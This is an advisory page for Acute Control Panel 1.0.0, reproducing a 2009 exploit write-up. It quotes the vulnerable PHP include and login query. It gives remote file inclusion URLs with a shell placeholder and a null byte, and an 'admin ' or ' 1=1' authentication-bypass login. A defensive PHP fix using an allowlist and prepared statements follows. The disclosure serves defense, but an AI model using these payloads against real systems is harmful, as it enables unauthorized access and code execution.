Vendor: Acute Control Panel
By: SirGod
CVSS: 7.5 (HIGH)
Remote File Inclusion and SQL Injection
CWE: 89, 98
Product Name: Acute Control Panel
Affected Version From: 1.0.0
Affected Version To: 1.0.0
Patch Exists: NO
Related CWE: N/A
CPE: a:acute_control_panel:acute_control_panel:1.0.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Acute Control Panel 1.0.0 RFI/SQL Injection (Auth Bypass)

Acute Control Panel 1.0.0 is vulnerable to Remote File Inclusion and SQL Injection. The file inclusion flaw is in container.php and header.php, which pass the request-supplied theme_directory value straight to include_once(); the SQL injection is in login.php, which interpolates the username and password directly into the query string. The PoCs for Remote File Inclusion are http://127.0.0.1/themes/container.php?theme_directory=[Shell]%00 and http://127.0.0.1/themes/header.php?theme_directory=[Shell]%00. The PoC for the SQL Injection authentication bypass is the username "admin ' or ' 1=1" with any password, or none.

Mitigation:

Input validation should be done to prevent SQL Injection and Remote File Inclusion attacks.
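
The mitigation above, shown as an added example (not code from Acute Control Panel or the advisory): an exact-match allowlist for the theme directory and a bound-parameter login lookup. ALLOWED_THEMES and its theme names, resolve_theme_dir(), find_user(), the use of PDO, and password_hash() storage are assumptions.

```php
<?php
declare(strict_types=1);

// Hypothetical allowlist; the real theme names are not given in the advisory.
const ALLOWED_THEMES = ['default', 'classic'];

function resolve_theme_dir(string $requested, string $themeRoot): string
{
    // Exact-match allowlist: URLs, "../" and NUL-terminated values never match,
    // so the include path is always built from a server-side constant.
    $theme = in_array($requested, ALLOWED_THEMES, true) ? $requested : ALLOWED_THEMES[0];
    return $themeRoot . '/' . $theme;
}

function find_user(PDO $db, string $username, string $password): ?array
{
    // Bound parameter: a quote in $username stays data, not SQL syntax.
    $stmt = $db->prepare(
        'SELECT id, username, password, email, fullname, permissions
           FROM users WHERE username = :u'
    );
    $stmt->execute([':u' => $username]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);

    // Assumption: the password column holds password_hash() output.
    if ($row === false || !password_verify($password, $row['password'])) {
        return null;
    }
    unset($row['password']);
    return $row;
}

// Constructed demo data: in-memory SQLite stands in for the MySQL users table.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT,
           password TEXT, email TEXT, fullname TEXT, permissions TEXT)');
$db->prepare('INSERT INTO users (username, password, email, fullname, permissions)
              VALUES (?, ?, ?, ?, ?)')
   ->execute(['admin', password_hash('constructed-pass', PASSWORD_DEFAULT),
              'admin@example.test', 'Admin', 'all']);

// Exercise find_user() with the advisory's login input, then valid credentials.
var_dump(find_user($db, "admin ' or ' 1=1", 'anything'));
var_dump(find_user($db, 'admin', 'constructed-pass'));
// Exercise resolve_theme_dir() with a remote URL ending in a NUL byte.
var_dump(resolve_theme_dir("http://example.test/x\0", '/var/www/themes'));
```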

Exploit-DB raw data:

###############################################################
[+] Acute Control Panel 1.0.0 RFI/SQL Injection (Auth Bypass)
[+] Discovered By SirGod
[+] www.mortal-team.org
[+] www.h4cky0u.org
###############################################################

[+] Remote File Inclusion

 Vulnerable code in container.php

-----------------------------------------------------------
<?php include_once($theme_directory."/sidebar.php"); ?>
-----------------------------------------------------------

 PoC :

  http://127.0.0.1/themes/container.php?theme_directory=[Shell]%00

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

 Vulnerable code in header.php

--------------------------------------------------------------
<?php include_once($theme_directory."/navigation.php"); ?>
--------------------------------------------------------------

 PoC :

  http://127.0.0.1/themes/header.php?theme_directory=[Shell]%00

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

[+] SQL Injection (Auth Bypass)

 Vulnerable code in login.php

--------------------------------------------
$query = mysql_query("SELECT
id,username,password,email,fullname,permissions FROM `users` WHERE
username='$username' AND password='$password'", $conn) or
die(mysql_error());
--------------------------------------------

 PoC :

  Username : admin ' or ' 1=1
  Password : anything or nothing

################################################################

# milw0rm.com [2009-03-26]